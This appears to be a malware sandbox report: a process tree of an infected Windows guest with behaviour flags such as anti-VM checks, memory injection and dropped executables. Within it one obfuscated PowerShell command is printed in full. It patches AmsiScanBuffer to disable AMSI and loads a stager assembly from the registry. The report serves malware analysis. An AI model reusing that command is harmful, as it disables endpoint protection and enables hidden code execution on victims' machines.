PID 4820 wrote to memory of 1036	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1060	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1104	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1216	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1228	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1288	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1328	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1368	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1428	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1492	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1500	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1544	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1664	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1712	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1752	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1820	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1828	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1972	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1984	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1472	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 1620	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2088	4820	dllhost.exe	spoolsv.exe
PID 4820 wrote to memory of 2100	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2216	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2336	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2516	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2524	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2656	4820	dllhost.exe	sihost.exe
PID 4820 wrote to memory of 2668	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2712	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2780	4820	dllhost.exe	sysmon.exe
PID 4820 wrote to memory of 2796	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2824	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2832	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2960	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 2968	4820	dllhost.exe	taskhostw.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:332

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{dcd36ac1-35d5-4e0e-b8f9-726877e42cc7}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4820

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1216

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2968

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AHVuQgwhrOzd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NfRTgEJJCtUklS,[Parameter(Position=1)][Type]$dJyOpuWkwB)$LcAnSsinVqg=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+'m'+'o'+''+'r'+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+'s'+'s'+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'A'+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+'s'+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$LcAnSsinVqg.DefineConstructor(''+[Char](82)+''+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NfRTgEJJCtUklS).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+'e,'+[Char](77)+'a'+'n'+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$LcAnSsinVqg.DefineMethod('In'+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+'g,'+'N'+''+'e'+'wSl'+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+'i'+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$dJyOpuWkwB,$NfRTgEJJCtUklS).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $LcAnSsinVqg.CreateType();}$sufpmVvViIfOu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+'e'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'ic'+'r'+''+'o'+''+'s'+'o'+'f'+''+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+'e'+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$ZjymfJTVfTBvul=$sufpmVvViIfOu.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,S'+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SkwCzzGOPSzTFMrcfIt=AHVuQgwhrOzd @([String])([IntPtr]);$RMDJYwLjzUmRvLiXwMyChL=AHVuQgwhrOzd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LwKaVIIkCQB=$sufpmVvViIfOu.GetMethod(''+[Char](71)+''+[Char](101)+'tMod'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+'an'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+'e'+[Char](108)+'32'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$eqLWsUqQHjYrmS=$ZjymfJTVfTBvul.Invoke($Null,@([Object]$LwKaVIIkCQB,[Object]('L'+'o'+''+'a'+'d'+[Char](76)+'i'+[Char](98)+''+[Char](114)+'a'+'r'+''+'y'+'A')));$ePtYAxfWeLLAgzrrZ=$ZjymfJTVfTBvul.Invoke($Null,@([Object]$LwKaVIIkCQB,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+[Char](117)+''+'a'+'l'+[Char](80)+'r'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$CplHmdD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eqLWsUqQHjYrmS,$SkwCzzGOPSzTFMrcfIt).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$BIfwkkycYBVoSdUte=$ZjymfJTVfTBvul.Invoke($Null,@([Object]$CplHmdD,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+'ca'+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$eevkJbyciN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ePtYAxfWeLLAgzrrZ,$RMDJYwLjzUmRvLiXwMyChL).Invoke($BIfwkkycYBVoSdUte,[uint32]8,4,[ref]$eevkJbyciN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BIfwkkycYBVoSdUte,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ePtYAxfWeLLAgzrrZ,$RMDJYwLjzUmRvLiXwMyChL).Invoke($BIfwkkycYBVoSdUte,[uint32]8,0x20,[ref]$eevkJbyciN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+'t'+'ag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4084

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1428

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1620

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2712

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2796

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2960

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3340

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3440

C:\Users\Admin\AppData\Local\Temp\dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
"C:\Users\Admin\AppData\Local\Temp\dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2156

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4292

C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
"C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
4⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856

C:\Users\Admin\AppData\Local\Temp\$77354151
"C:\Users\Admin\AppData\Local\Temp\$77354151"
5⤵
- Executes dropped EXE
PID:4784

C:\Users\Admin\AppData\Local\Temp\$77af6dbd
"C:\Users\Admin\AppData\Local\Temp\$77af6dbd"
5⤵
- Executes dropped EXE
PID:648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 600
6⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3576

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3908

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3816

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:5084

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:540

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4260

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1248

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:2708

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3696

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3308

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4516

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4740

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 648 -ip 648
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2996

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3584

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:3412

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

Virtualization/Sandbox Evasion

System Information Discovery